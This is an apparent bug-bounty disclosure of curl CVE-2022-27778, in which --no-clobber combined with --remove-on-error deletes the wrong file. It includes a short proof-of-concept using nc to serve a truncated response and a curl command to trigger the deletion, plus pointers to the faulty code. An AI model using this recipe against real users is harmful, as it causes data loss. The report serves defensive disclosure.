curl: CVE-2022-27778: curl removes wrong file on error

Summary:

Curl command has a logic flaw that results in removal of a wrong file when combining --no-clobber and --remove-on-error if the target file name exists and an error occurs.

Steps To Reproduce:

1. echo "important file" > foo
2. echo -ne "HTTP/1.1 200 OK\r\nContent-Length: 666\r\n\r\nHello\n" | nc -l -p 9999
3. curl -m 3 --no-clobber --remove-on-error --output foo http://testserver.tld:9999/
4. ls -l foo*
5. cat foo.1

-m 3 is used here to simulate a denial of service of the connection performed by the attacker.

The bug appears to happen because the remote-on-error unlink is called without considering the no-clobber generated file name:

• no-clobber name generation; https://github.com/curl/curl/blob/3fd1d8df3a2497078d580f43c17311e6f58186a1/src/tool_cb_wrt.c#L88
• remove-on-error unlink: https://github.com/curl/curl/blob/f7f26077bc563375becdb2adbcd49eb9f28590f9/src/tool_operate.c#L598

Impact

Removal of a file that was supposed not to be overwritten (data loss). Incomplete file left of disk when it should have been removed. This can lead to potential loss of integrity or availability.

For this attack to work the attacker of course would need to know a scenario where the victim is performing curl operation with --no-clobber --remove-on-error options.